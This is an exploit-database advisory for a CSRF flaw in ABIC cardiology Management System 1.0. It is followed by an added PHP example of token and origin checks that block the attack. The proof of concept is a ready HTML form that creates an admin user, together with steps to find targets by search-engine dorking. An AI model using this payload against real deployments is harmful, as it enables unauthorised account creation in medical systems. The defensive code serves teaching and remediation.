## https://sploitus.com/exploit?id=PACKETSTORM:180248
=============================================================================================================================================  
| # Title : ABIC cardiology Management System 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://abicegypt.com/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engine.  
  
[+] Line 7 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<div class="panel panel-default panel-table">  
<div class="panel-heading"> <h2 class="text-center">New User </h2>  
</div>  
<div class="panel-body">  
<div class="col-md-offset-2 col-md-8">  
  
<form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1">  
  
<div class="form-group"> User Name  
<input type="text" name="username" class="form-control" placeholder="Insert User Name">  
</div>  
<div class="form-group"> Password  
<input type="text" name="password" class="form-control" placeholder="Insert Password">  
</div>  
  
<div class="col-xs-12">  
<button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button>  
</div>  
<input type="hidden" name="MM_insert" value="form1">  
</form>  
  
</div>  
</div>  
</div>  
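
The form above carries only its field values (`username`, `password`, `add`, `MM_insert`), so the endpoint has nothing with which to tell a post from its own admin page apart from one submitted by another site. A server-side check that closes that gap, as an added example that is not code from the advisory or the vendor; the function names, the `csrf_token` field and the `https://clinic.example` origin are assumptions:

```php
<?php
declare(strict_types=1);
// Added example; every name here is hypothetical, not the vendor's code.
// Issue a per-session token; the real form embeds it as a hidden field.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept only requests whose Origin (or, failing that, Referer) is our own site.
function csrf_same_origin(array $server, string $expectedOrigin): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $parts = parse_url($source);
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return false; // header missing or unparsable: fail closed
    }
    $origin = $parts['scheme'] . '://' . $parts['host']
        . (isset($parts['port']) ? ':' . $parts['port'] : '');
    return hash_equals($expectedOrigin, $origin);
}

// Gate to run before any state-changing POST such as "create user".
function csrf_request_allowed(array $session, array $post, array $server, string $site): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied)
        && csrf_same_origin($server, $site);
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = csrf_issue_token($session);
$site = 'https://clinic.example';
$fields = ['username' => 'x', 'password' => 'y', 'MM_insert' => 'form1'];

// Cross-site post: same fields as the form, foreign Origin, no token.
$forged = csrf_request_allowed($session, $fields,
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'], $site);
// Post from the application's own page, token included.
$legit = csrf_request_allowed($session, $fields + ['csrf_token' => $token],
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site], $site);
var_dump($forged, $legit);
```

In a deployment the token lives in `$_SESSION` and the arrays passed in are `$_POST` and `$_SERVER`; setting the session cookie's `SameSite` attribute to `Lax` or `Strict` adds a second layer.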
  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================